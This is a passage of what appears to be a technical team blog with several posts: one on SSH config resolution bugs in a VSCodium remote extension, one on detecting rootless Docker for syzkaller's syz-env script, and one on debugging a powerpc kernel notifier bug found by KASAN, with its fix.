Wait, how did that last one slip in? Well, unlike environment variables, it's a lot harder for processes to propagate command line flags correctly. If resolving the config involves running a script that itself tries to run SSH, chances are the -F flag won't be propagated and you'll see some weird behaviour.

I swear that's all for now, you've probably learned more about SSH configs than you will ever need to care about.

Back to VSCodium

Alright, armed now with this knowledge on SSH config parsing, we can work out what's going on with the extension. It ends up being a simple issue: it doesn't apply rules (3) and (4), so all Host matches are done against the original host name.

In my case, there are several machines behind the proxy, but they all share a common suffix, so I had a Host *.ozlabs.ibm.com rule to apply the proxy. I also use aliases to refer to the machines without the .ozlabs.ibm.com suffix, so failing to follow rule (3) lead to the situation where the extension didn't think there was a proxy.

However, even if this were to be fixed, it still doesn't respect rule (4), or most complex match logic in general. If the hostname bug is fixed then my setup would work, but it's less than ideal to keep playing whack-a-mole with parsing bugs. It would be a lot easier if there was a way to just ask SSH for the config that a given host name resolves to.

Enter ssh -G. The -G flag asks SSH to dump the complete resolved config, without actually opening the connection (it may execute arbitrary code while resolving the config however!). So to fix the extension once and for all, we could swap the manual parser to just invoking ssh -G example, and parsing the output as the final config. No Host or Match or HostName or Match final quirks to worry about.

Sure enough, if we replace the config backend with this 'native' resolver, we can connect to all the machines with no problem. Hopefully the pull request to add this support will get accepted, and I can stop running my locally patched copy of the extension.

In general, I'd suggest avoiding any dependency on a second pass being done on the config. Resolve your aliases early, so that the rest of your matches work against the full hostname. If you later need to match against the name passed in the command line, you can use Match originalhost=example. The example above should always be written as

Host example
    HostName example.ozlabs.ibm.com

Match host="*.ozlabs.ibm.com"
    ProxyJump proxy

even if the reversed order might appear to work thanks to the weird interactions described above. And after learning these parser quirks, I find the idea of using Host match statements unreliable; that they may or may not be run against the HostName value allows for truely strange bugs to appear. Maybe you should remove this uncertainty by starting your config with Match final to at least always be parsed the same way.

Detecting rootless Docker

Trying to do some fuzzing...

The other day, for the first time in a while, I wanted to do something with syzkaller, a system call fuzzer that has been used to find literally thousands of kernel bugs. As it turns out, since the last time I had done any work on syzkaller, I switched to a new laptop, and so I needed to set up a few things in my development environment again.

While I was doing this, I took a look at the syzkaller source again and found a neat little script called syz-env, which uses a Docker image to provide you with a standardised environment that has all the necessary tools and dependencies preinstalled.

I decided to give it a go, and then realised I hadn't actually installed Docker since getting my new laptop. So I went to do that, and along the way I discovered rootless mode, and decided to give it a try.

What's rootless mode?

As of relatively recently, Docker supports rootless mode, which allows you to run your dockerd as a non-root user. This is helpful for security, as traditional "rootful" Docker can trivially be used to obtain root privileges outside of a container. Rootless Docker is implemented using RootlessKit (a fancy replacement for fakeroot that uses user namespaces) to create a new user namespace that maps the UID of the user running dockerd to 0.

You can find more information, including details of the various restrictions that apply to rootless setups, in the Docker documentation.

The problem

I ran tools/syz-env make to test things out. It pulled the container image, then gave me some strange errors:

ajd@jarvis-debian:~/syzkaller$ tools/syz-env make NCORES=1
gcr.io/syzkaller/env:latest
warning: Not a git repository. Use --no-index to compare two paths outside a working tree
usage: git diff --no-index [<options>] <path> <path>

    ...

fatal: detected dubious ownership in repository at '/syzkaller/gopath/src/github.com/google/syzkaller'
To add an exception for this directory, call:

        git config --global --add safe.directory /syzkaller/gopath/src/github.com/google/syzkaller
fatal: detected dubious ownership in repository at '/syzkaller/gopath/src/github.com/google/syzkaller'
To add an exception for this directory, call:

        git config --global --add safe.directory /syzkaller/gopath/src/github.com/google/syzkaller
go list -f '{{.Stale}}' ./sys/syz-sysgen | grep -q false || go install ./sys/syz-sysgen
error obtaining VCS status: exit status 128
        Use -buildvcs=false to disable VCS stamping.
error obtaining VCS status: exit status 128
        Use -buildvcs=false to disable VCS stamping.
make: *** [Makefile:155: descriptions] Error 1

After a bit of digging, I found that syz-env mounts the syzkaller source directory inside the container as a volume. make was running with UID 1000, while the files in the mounted volume appeared to be owned by root.

Reading the script, it turns out that syz-env invokes docker run with the --user option to set the UID inside the container to match the user's UID outside the container, to ensure that file ownership and permissions behave as expected.

This works in rootful Docker, where files appear inside the container to be owned by the same UID as they are outside the container. However, it breaks in rootless mode: due to the way RootlessKit sets up the namespaces, the user's UID is mapped to 0, causing the files to appear to be owned by root.

The workaround seemed pretty obvious: just skip the --user flag if running rootless.

How can you check whether your Docker daemon is running in rootless mode?

It took me quite a while, as a total Docker non-expert, to figure out how to definitively check whether the Docker daemon is running rootless or not. There's a variety of ways you could do this, such as checking the name of the current Docker context to see if it's called rootless (as used by the Docker rootless setup scripts), but I think the approach I settled on is the most correct one.

If you want to check whether your Docker daemon is running in rootless mode, use docker info to query the daemon's security options, and check for the rootless option.

docker info -f "{{println .SecurityOptions}}" | grep rootless

If this prints something like:

[name=seccomp,profile=builtin name=rootless name=cgroupns]

then you're running rootless.

If not, then you're running the traditional rootful.

Easy! (And I sent a fix which is now merged into syzkaller!)

Dumb bugs: the PCI device that wasn't

I was happily minding my own business one fateful afternoon when I received the following kernel bug report:

BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00
Read of size 4 at addr c000000264c26fdc by task swapper/0/1

Call Trace:
dump_stack_lvl+0x1bc/0x2b8 (unreliable)
print_report+0x3f4/0xc60
kasan_report+0x244/0x698
__asan_load4+0xe8/0x250
vga_arbiter_add_pci_device+0x60/0xe00
pci_notify+0x88/0x444
notifier_call_chain+0x104/0x320
blocking_notifier_call_chain+0xa0/0x140
device_add+0xac8/0x1d30
device_register+0x58/0x80
vio_register_device_node+0x9ac/0xce0
vio_bus_scan_register_devices+0xc4/0x13c
__machine_initcall_pseries_vio_device_init+0x94/0xf0
do_one_initcall+0x12c/0xaa8
kernel_init_freeable+0xa48/0xba8
kernel_init+0x64/0x400
ret_from_kernel_thread+0x5c/0x64

OK, so KASAN has helpfully found an out-of-bounds access in vga_arbiter_add_pci_device(). What the heck is that?

Why does my VGA require arbitration?

I'd never heard of the VGA arbiter in the kernel (do kids these days know what VGA is?), or vgaarb as it's called. What it does is irrelevant to this bug, but I found the history pretty interesting! Benjamin Herrenschmidt proposed VGA arbitration back in 2005 as a way of resolving conflicts between multiple legacy VGA devices that want to use the same address assignments. This was previously handled in userspace by the X server, but issues arose with multiple X servers on the same machine. Plus, it's probably not a good idea for this kind of thing to be handled by userspace. You can read more about the VGA arbiter in the kernel docs, but it's probably not something anyone has thought much about in a long time.

The bad access

static bool vga_arbiter_add_pci_device(struct pci_dev *pdev)
{
        struct vga_device *vgadev;
        unsigned long flags;
        struct pci_bus *bus;
        struct pci_dev *bridge;
        u16 cmd;

        /* Only deal with VGA class devices */
        if ((pdev->class >> 8) != PCI_CLASS_DISPLAY_VGA)
                return false;

We're blowing up on the read to pdev->class, and it's not something like the data being uninitialised, it's out-of-bounds. If we look back at the call trace:

vga_arbiter_add_pci_device+0x60/0xe00
pci_notify+0x88/0x444
notifier_call_chain+0x104/0x320
blocking_notifier_call_chain+0xa0/0x140
device_add+0xac8/0x1d30
device_register+0x58/0x80
vio_register_device_node+0x9ac/0xce0
vio_bus_scan_register_devices+0xc4/0x13c

This thing is a VIO device, not a PCI device! Let's jump into the caller, pci_notify(), to find out how we got our pdev.

static int pci_notify(struct notifier_block *nb, unsigned long action,
                      void *data)
{
        struct device *dev = data;
        struct pci_dev *pdev = to_pci_dev(dev);

So pci_notify() gets called with our VIO device (somehow), and we're converting that struct device into a struct pci_dev with no error checking. We could solve this particular bug by just checking that our device is actually a PCI device before we proceed - but we're in a function called pci_notify, we're expecting a PCI device to come in, so this would just be a bandaid.

to_pci_dev() works like other struct containers in the kernel - struct pci_dev contains a struct device as a member, so the container_of() function returns an address based on where a struct pci_dev would have to be if the given struct device was actually a PCI device. Since we know it's not actually a PCI device and this struct device does not actually sit inside a struct pci_dev, our pdev is now pointing to some random place in memory, hence our access to a member like class is caught by KASAN.

Now we know why and how we're blowing up, but we still don't understand how we got here, so let's back up further.

Notifiers

The kernel's device subsystem allows consumers to register callbacks so that they can be notified of a given event. I'm not going to go into a ton of detail on how they work, because I don't fully understand myself, and there's a lot of internals of the device subsystem involved. The best references I could find for this are notifier.h, and for our purposes here, the register notifier functions in bus.h.

Something's clearly gone awry if we can end up in a function named pci_notify() without passing it a PCI device. We find where the notifier is registered in vgaarb.c here:

static struct notifier_block pci_notifier = {
        .notifier_call = pci_notify,
};

static int __init vga_arb_device_init(void)
{
        /* some stuff removed here... */

        bus_register_notifier(&pci_bus_type, &pci_notifier);

This all looks sane. A blocking notifier is registered so that pci_notify() gets called whenever there's a notification going out to PCI buses. Our VIO device is distinctly not on a PCI bus, and in my debugging I couldn't find any potential causes of such confusion, so how on earth is a notification for PCI buses being applied to our non-PCI device?

Deep in the guts of the device subsystem, if we have a look at device_add() we find the following:

int device_add(struct device *dev)
{
        /* lots of device init stuff... */

        if (dev->bus)
                blocking_notifier_call_chain(&dev->bus->p->bus_notifier,
                                             BUS_NOTIFY_ADD_DEVICE, dev);

If the device we're initialising is attached to a bus, then we call the bus notifier of that bus with the BUS_NOTIFY_ADD_DEVICE notification, and the device in question. So we're going through the process of adding a VIO device, and somehow calling into a notifier that's only registered for PCI devices. I did a bunch of debugging to see if our VIO device was somehow malformed and pointing to a PCI bus, or the struct subsys_private (that's the bus->p above) was somehow pointing to the wrong place, but everything seemed sane. My thesis of there being confusion while matching devices to buses was getting harder to justify - everything still looked sane.

Debuggers

I do not like debuggers. I am an avid printk() enthusiast. There's no real justification for this, a bunch of my problems could almost certainly be solved easier by using actual tools, but my brain seemingly enjoys the routine of printing and building and running until I figure out what's going on. It was becoming increasingly obvious, however, that printk could not save me here, and we needed to go deeper.

Very thankfully for me, even though this bug was discovered on real hardware, it reproduces easily in QEMU, making iteration easy. With GDB attached to QEMU, it's time to dive in to the guts of this issue and figure out what's happening.

Somehow, VIO buses are ending up with pci_notify() in their bus_notifier list. Let's break down the data structures here with a look at struct notifier_block:

struct notifier_block {
        notifier_fn_t notifier_call;
        struct notifier_block __rcu *next;
        int priority;
};

So notifier chains are singly linked lists. Callbacks are registered through functions like bus_register_notifier(), then after a long chain of breadcrumbs we reach notifier_chain_register() which walks the list of ->next pointers until it reaches NULL, at which point it sets ->next of the tail node to the struct notifier_block that was passed in. It's very important to note here that the data being appended to the list here is not just the callback function (i.e. pci_notify()), but the struct notifier_block itself (i.e. struct notifier_block pci_notifier from earlier). There's no new data being initialised, just updating a pointer to the object that was passed by the caller.

If you've guessed what our bug is at this point, great job! If the same struct notifier_block gets registered to two different bus types, then both of their bus_notifier fields will point to the same memory, and any further notifiers registered to either bus will end up being referenced by both since they walk through the same node.

So we bust out the debugger and start looking at what ends up in bus_notifier for PCI and VIO buses with breakpoints and watchpoints.

Candidates

Walking the bus_notifier list gave me the following:

__gcov_.perf_trace_module_free
fail_iommu_bus_notify
isa_bridge_notify
ppc_pci_unmap_irq_line
eeh_device_notifier
iommu_bus_notifier
tce_iommu_bus_notifier
pci_notify

Time to find out if our assumption is correct - the same struct notifier_block is being registered to both bus types. Let's start going through them!

First up, we have __gcov_.perf_trace_module_free. Thankfully, I recognised this as complete bait. Trying to figure out what gcov and perf are doing here is going to be its own giant rabbit hole, and unless building without gcov makes our problem disappear, we skip this one and keep on looking. Rabbit holes in the kernel never end, we have to be strategic with our time!

Next, we reach fail_iommu_bus_notify, so let's take a look at that.

static struct notifier_block fail_iommu_bus_notifier = {
        .notifier_call = fail_iommu_bus_notify
};

static int __init fail_iommu_setup(void)
{
#ifdef CONFIG_PCI
        bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
#endif
#ifdef CONFIG_IBMVIO
        bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
#endif

        return 0;
}

Sure enough, here's our bug. The same node is being registered to two different bus types:

+------------------+
| PCI bus_notifier \
+------------------+\
                     \+-------------------------+    +-----------------+    +------------+
                      | fail_iommu_bus_notifier |----| PCI + VIO stuff |----| pci_notify |
                     /+-------------------------+    +-----------------+    +------------+
+------------------+/
| VIO bus_notifier /
+------------------+

when it should be like:

+------------------+    +-----------------------------+    +-----------+    +------------+
| PCI bus_notifier |----| fail_iommu_pci_bus_notifier |----| PCI stuff |----| pci_notify |
+------------------+    +-----------------------------+    +-----------+    +------------+

+------------------+    +-----------------------------+    +-----------+
| VIO bus_notifier |----| fail_iommu_vio_bus_notifier |----| VIO stuff |
+------------------+    +-----------------------------+    +-----------+

The fix

Ultimately, the fix turned out to be pretty simple:

Author: Russell Currey <ruscur@russell.cc>
Date:   Wed Mar 22 14:37:42 2023 +1100

    powerpc/iommu: Fix notifiers being shared by PCI and VIO buses

    fail_iommu_setup() registers the fail_iommu_bus_notifier struct to both
    PCI and VIO buses.  struct notifier_block is a linked list node, so this
    causes any notifiers later registered to either bus type to also be
    registered to the other since they share the same node.

    This causes issues in (at least) the vgaarb code, which registers a
    notifier for PCI buses.  pci_notify() ends up being called on a vio
    device, converted with to_pci_dev() even though it's not a PCI device,
    and finally makes a bad access in vga_arbiter_add_pci_device() as
    discovered with KASAN:

    [stack trace redacted, see above]

    Fix this by creating separate notifier_block structs for each bus type.

    Fixes: d6b9a81b2a45 ("powerpc: IOMMU fault injection")
    Reported-by: Nageswara R Sastry <rnsastry@linux.ibm.com>
    Signed-off-by: Russell Currey <ruscur@russell.cc>

diff --git a/arch/powerpc/kernel/iommu.c b/arch/powerpc/kernel/iommu.c
index ee95937bdaf1..6f1117fe3870 100644
--- a/arch/powerpc/kernel/iommu.c
+++ b/arch/powerpc/kernel/iommu.c
@@ -171,17 +171,26 @@ static int fail_iommu_bus_notify(struct notifier_block *nb,
         return 0;
 }

-static struct notifier_block fail_iommu_bus_notifier = {
+/*
+ * PCI and VIO buses need separate notifier_block structs, since they're linked
+ * list nodes.  Sharing a notifier_block would mean that any notifiers later
+ * registered for PCI buses would also get called by VIO buses and vice versa.
+ */
+static struct notifier_block fail_iommu_pci_bus_notifier = {
+        .notifier_call = fail_iommu_bus_notify
+};
+
+static struct notifier_block fail_iommu_vio_bus_notifier = {
         .notifier_call = fail_iommu_bus_notify
 };

 static int __init fail_iommu_setup(void)
 {
 #ifdef CONFIG_PCI
-        bus_register_notifier(&pci_bus_type, &fail_iommu_bus_notifier);
+        bus_register_notifier(&pci_bus_type, &fail_iommu_pci_bus_notifier);
 #endif
 #ifdef CONFIG_IBMVIO
-        bus_register_notifier(&vio_bus_type, &fail_iommu_bus_notifier);
+        bus_register_notifier(&vio_bus_type, &fail_iommu_vio_bus_notifier);
 #endif

         return 0;

Easy! Problem solved. The commit that introduced this bug back in 2012 was written by the legendary Anton Blanchard, so it's always a treat to discover an Anton bug. Ultimately this bug is of little consequence, but it's always fun to catch dormant issues with powerful tools like KASAN.

In conclusion

I think this bug provides a nice window into what kernel debugging can be like. Thankfully, things are made easier by not dealing with any specific hardware and being easily reproducible in QEMU.

Bugs like this have an absurd amount of underlying complexity, but you rarely need to understand all of it to comprehend the situation and discover the issue. I spent way too much time digging into device subsystem internals, when the odds of the issue lying within were quite low - the combination of IBM VIO devices and VGA arbitration isn't exactly common, so searching for potential issues within the guts of a heavily utilised subsystem isn't going to yield results very often.

Is there something haunted in the device subsystem? Is there something haunted inside the notifier handlers? It's possible, but assuming the core guts of the kernel have a baseline level of sanity helps to let you stay focused on the parts more likely to be relevant.

Finally, the process was made much easier by having good code navigation. A ludicrous amount of kernel developers still use plain vim or Emacs, maybe with tags if you're lucky, and get by on git grep (not even ripgrep!) and memory. Sort yourselves out and get yourself an editor with LSP support. I personally use Doom Emacs with clangd, and with the amount of jumping around the kernel I had to do to solve this bug, it would've been a much bigger ordeal without that power.

If you enjoyed the read, why not follow me on Mastodon or checkout Ben's recount of another cursed bug! Thanks for stopping by.